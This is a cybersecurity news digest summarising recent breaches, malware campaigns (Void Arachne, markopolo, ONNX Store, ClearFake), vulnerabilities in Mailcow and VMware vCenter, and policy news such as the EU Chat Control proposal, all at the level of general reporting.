Daily Brief

A global ticket-selling company experienced a data breach due to misconfigured Google Tag Manager (GTM) tags, which were outsourced for management. The breach demonstrates the risks associated with not maintaining active oversight of tracking technologies and data privacy compliance. The misuse of GTM highlights a common issue across many businesses, where GTM connects to multiple apps, often without proper configuration, risking data exposure. About 45% of applications connected through GTM are for advertising purposes, with a significant number potentially leaking sensitive user data. The article emphasizes the need for companies to enforce strict compliance with data privacy laws like GDPR and CCPA to avoid hefty penalties and lawsuits. Continuous web threat management systems are advised to monitor and control tag configurations effectively, mitigating risks while balancing marketing and security needs. The case study underscores the broader implications and potential financial and reputational damage from GTM misconfigurations in various industries.

A novel threat group named Void Arachne is targeting Chinese-speaking users by disguising malware in popular VPN software installers using Windows Installer files. The primary malware distributed, known as Winos 4.0, is a sophisticated Command-and-Control (C&C) framework capable of DDoS attacks, disk searches, webcam and microphone control, keylogging, and more. The campaign exploits social media, messaging platforms like Telegram, and search engine optimization poisoning to distribute its malicious software, effectively using the interests of users in bypassing internet censorship in China. Void Arachne also uses AI technology in its attacks, including software for creating deepfake pornography and voice-altering tools, raising significant privacy and ethical concerns. The malware facilitates persistence by altering firewall rules to permit traffic, using a loader that executes a second-stage payload to establish long-term access and control over infected systems. Researchers identified custom plugins developed by the attackers that enhance the functionality of the Winos 4.0 framework, indicating a high level of sophistication and potential for future modular expansion. Void Arachne’s methods highlight the importance of vigilance in downloading software, especially VPNs, from trustworthy sources to avoid falling prey to such targeted malware distribution campaigns.

A cybercriminal known as markopolo orchestrates a broad scam targeting cryptocurrency users, utilizing fake virtual meeting software named Vortax and 23 other malicious applications. These applications are employed to distribute information stealer malware specifically aimed at macOS and Windows systems, including Rhadamanthys, StealC, and Atomic macOS Stealer (AMOS). markopolo builds a facade of legitimacy for Vortax through social media, supported by a verified X account and a Medium blog hosting AI-generated content. Victims are lured via social media engagements, as well as crypto-centric channels on Discord and Telegram, where they are directed to download booby-trapped software via a RoomID system. Upon entering the provided RoomID on the Vortax website, users are redirected to Dropbox links or other sites for malware-laden software installation. Recorded Future attributes continuous shared hosting use and Command and Control (C2) infrastructure across all builds to markopolo, indicating a streamlined, agile operation. The scam's operational agility allows for quick shifts to new lures after detection, mirroring broader trends in cybercriminal exploitation of cloud services for phishing and info-stealing attacks.

Two vulnerabilities in the Mailcow mail server suite can lead to arbitrary code execution on affected servers. All versions of Mailcow prior to the April 2024 release (version 2024-04) are susceptible to these security flaws. The vulnerabilities allow attackers to inject malicious scripts into the admin panel, potentially hijacking administrator sessions. Attack scenarios include sending a specially crafted HTML email to trigger unauthorized actions without user interaction. Both the vulnerabilities were responsibly disclosed by SonarSource on March 22, 2024, with the software flaws being rated as moderate in severity. Exploitations of these flaws could allow attackers to execute commands and access sensitive data under the guise of an administrator. Mailcow has released an updated version to address these vulnerabilities and users are advised to update immediately to protect their data.

Cybercriminals are using sophisticated social-engineering attacks to trick users into executing malicious PowerShell scripts by presenting fake error messages related to popular software like Google Chrome and Microsoft Word. Victims visiting legitimate but compromised websites encounter pop-up warnings that prompt them to install a fix by pasting a script into their PowerShell terminal, which then downloads and executes malware. At least two criminal gangs, identified as TA571 and the group behind the ClearFake malware campaign, are actively using this tactic, which has recently expanded to include a third operation known as ClearFix. The downloaded malware can perform multiple harmful activities such as stealing credentials, hijacking cryptocurrency transactions, and installing additional malware including ransomware. Proofpoint's researchers named a method "EtherHiding" where malicious scripts involved in these attacks are hosted on blockchain services, complicating tracking and mitigation efforts. Notably, one campaign encourages users to copy a Base64-encoded PowerShell command, leading to the installation of further malware loaders and potentially ransomware. Proofpoint emphasizes the importance of organizational training to help employees recognize and report these types of deceptive tactics and highlights the criticality of this threat‘s persistence and evolution.

Ronald Simpson, ex-IT director at Webster University, pleaded guilty to a $2.1 million fraud involving the university and a computer equipment supplier. Simpson orchestrated a scheme from 2018 to 2023, misleading both the school and supplier to enrich himself through illicit sales. He faces up to 20 years in prison and a $250,000 fine with sentencing scheduled for September. The fraud entailed Simpson purchasing equipment under false pretenses and selling it to a third party, diverting funds to his personal accounts. Webster University terminated Simpson in September 2023 upon discovering the fraudulent activities. As part of the scam, Simpson exploited a return policy meant for defective items, falsely claiming equipment issues to receive and then sell replacements. The FBI conducted the investigation that led to Simpson’s guilty plea.

AMD's internal data is being advertised for sale on the dark web by an individual using the pseudonym IntelBroker. The data for sale reportedly includes customer databases, product specifications, internal financial details, staff information, and source code among other sensitive documents. AMD acknowledges awareness of the purported incident and is collaborating with law enforcement and third-party services to investigate the claims. IntelBroker, the vendor of this data, is known for distributing information from previous high-profile security breaches including incidents involving Europol, Home Depot, and the Pentagon. The legitimacy and actual value of the stolen data are unclear, posing a substantial risk to potential buyers in the underground market. The exposure of such critical information could potentially facilitate activities by phishers, fraudsters, and unscrupulous investors. Law enforcement officials are actively pursuing individuals associated with BreachForums, increasing pressure on IntelBroker and other users of the platform.

The EU Council has delayed a vote on a legislative proposal aimed at protecting children online by mandating the scanning of private digital communications for illegal content. Critics, including tech companies and civil liberties groups, argue that the proposal, known as Chat Control, would undermine encryption, jeopardizing user privacy and security. The proposed client-side scanning, or "upload moderation," would require internet services to pre-scan messages and media on devices before encryption, looking for content such as child sexual abuse material (CSAM). This approach has been widely contested; similar plans by Apple were abandoned in 2021 after significant opposition. Signal’s CEO Meredith Whittaker has expressed concerns that such technology is unfeasible without creating vulnerabilities that could have wide-reaching implications. European MPs have urged the Council of Europe to reject the proposal, warning that it contravenes the European commitment to secure communication and digital privacy. Business entities like Threema threaten to exit the European market if forced to comply, citing a loss of secure and private communication for EU citizens and professionals.

AMD is investigating a possible cyberattack after data claiming to be stolen was listed for sale on a hacking forum. A threat actor known as IntelBroker alleges to possess AMD employee details, confidential financial records, and other sensitive data. IntelBroker claims the data includes future AMD product details, employee databases, and more sensitive files. AMD is coordinating closely with law enforcement and a third-party hosting provider to determine the authenticity and importance of the claimed data. The hacker, also linked to previous breaches involving DC Health Link and the Europol Platform for Experts, has a history of significant cyber incidents. AMD remains cautious as it had dealt with a similar threat in June 2022 from the RansomHouse extortion group, which claimed a substantial data theft. The tech company has not confirmed the veracity of the new hacking claim as the investigation continues.

Researchers have identified a phishing-as-a-service platform, ONNX Store, aimed at Microsoft 365 accounts primarily within financial institutions. ONNX Store utilizes QR codes in PDF attachments to bypass traditional phishing defenses and two-factor authentication, targeting employees under the guise of HR communication. The platform, believed to be operated by the Arabic-speaking hacker MRxC0DER, provides a robust mechanism including real-time credential theft via phishing pages that replicate the Microsoft 365 login screen. ONNX allows its clients to manage phishing campaigns through Telegram bots, offering customizable Microsoft Office 365 phishing templates and support channels for operational assistance. Attacks observed include phishing emails impersonating HR departments with offers of salary updates to lure victims into scanning malicious QR codes and entering login credentials. Captured credentials and 2FA tokens are immediately transferred to the attackers, enabling potential unauthorized access to sensitive company information. ONNX’s infrastructure uses advanced deception techniques such as encrypted JavaScript and Cloudflare services to evade detection and ensure ongoing operations through bulletproof hosting. Protection against ONNX phishing involves blocking unverified PDF and HTML attachments, avoiding untrusted HTTPS sites, and implementing FIDO2 hardware for securing high-risk accounts.

VMware issued a security advisory for critical vulnerabilities in vCenter Server, affecting remote code execution and local privilege escalation. Affected versions include vCenter Server 7.0 and 8.0, along with VMware Cloud Foundation 4.x and 5.x. Three specific vulnerabilities were addressed: CVE-2024-37079, CVE-2024-37080, CVE-2024-37081. Updates are available in vCenter Server 8.0 U2d, 8.0 U1e, and 7.0 U3r; Cloud Foundation patches are accessible through KB88287. VMware states that updating vCenter Server will not impact running workloads or VMs, though temporary unavailability of management interfaces is likely during the upgrade. No active exploitation of these vulnerabilities has been detected, yet VMware urges updating immediately due to the risk of targeting by threat actors. The company also identified an issue with custom ciphers in version 7.0 U3r, recommending a precheck.

An investigative report by the Australian Information Commissioner revealed significant security oversights by Medibank, including unenforced multi-factor authentication (MFA), leading to a severe data breach. The breach occurred when a Medibank contractor's browser-stored work credentials were stolen from his home computer by malware. The attacker exploited these credentials to access Medibank's systems, including their Microsoft Exchange and VPN, allowing for extensive internal access. Between August 25 and October 13, 2022, the attacker extracted 520 GB of sensitive customer data, including personal and health information. Failure to act on generated EDR software alerts in late August allowed the breach to propagate undetected until mid-October. The breach revealed by Medibank in October 2022 effectively compromised the personal data of 9.7 million customers. The report underscores the necessity of robust security measures like MFA, especially for systems like VPNs, which are highly targeted by cyber actors.

The European Union has introduced a controversial proposal to scan users' private messages for child sexual abuse material (CSAM), raising significant concerns among privacy advocates. Meredith Whittaker, president of the Signal Foundation, criticized the proposal, stating that it severely undermines the integrity of end-to-end encryption (E2EE). The proposed measure, known as "upload moderation," would require messages to be analyzed before encryption, allowing for the detection of CSAM. The law excludes audio communications and requires user consent under service provider terms, offering alternatives for users who do not consent to scanning. Europol emphasizes the need for tech industry cooperation to balance public safety and privacy, suggesting the design of systems capable of reporting harmful activity without breaking encryption. The response from the tech community, including Apple, highlights concerns about privacy infringement and the potential for such measures to lead to broader surveillance practices. Signal warns that interfering with encryption algorithms or creating backdoors for scanning could lead to vulnerabilities, exploitable by both malicious actors and nation-state hackers.

The CHERI Alliance CIC has been established to promote the adoption of CHERI security technology, enhancing memory safety in CPUs. Founding members include notable organizations like the FreeBSD Foundation, University of Cambridge, and various security and chip design companies. CHERI technology focuses on preventing common memory vulnerabilities such as buffer overflows through fine-grained security controls. Despite significant involvement in developing CHERI, chip designer Arm is conspicuously absent from the alliance’s member list. The Alliance aims to stimulate industry collaboration, foster academic partnerships, and push for CHERI's broad implementation across different ISAs. The initiative is mentioned in a White House report emphasizing the importance of hardware support for robust memory safety. Efforts are being focused around the RISC-V ISA, suggesting a strategic pivot or broadening of technological foundations. The CHERI Alliance is set to formally launch in September and is currently open for new members.

Two individuals, Sagar Steven Singh and Nicholas Ceraolo, admitted guilt for hacking a federal law enforcement database as part of a blackmail scheme. The hackers were part of "ViLE", a group that exploited stolen personal information to extort money by threatening to release it publicly. They used stolen credentials of a police officer to access a law enforcement database containing sensitive information about criminal activities and personal data. Ceraolo further impersonated officers to extract additional personal data from social media platforms under false pretenses. The exposed data was used in blackmail attempts, including threats to disclose personal details like social security numbers and addresses unless payment was received. In one incident, Singh demanded Instagram account credentials by threatening the target’s family safety. The U.S. Department of Justice is pursuing the case, with sentences for the crimes committed by Singh and Ceraolo ranging from two to seven years. Ongoing efforts are being made to apprehend and prosecute other members of the ViLE hacking group.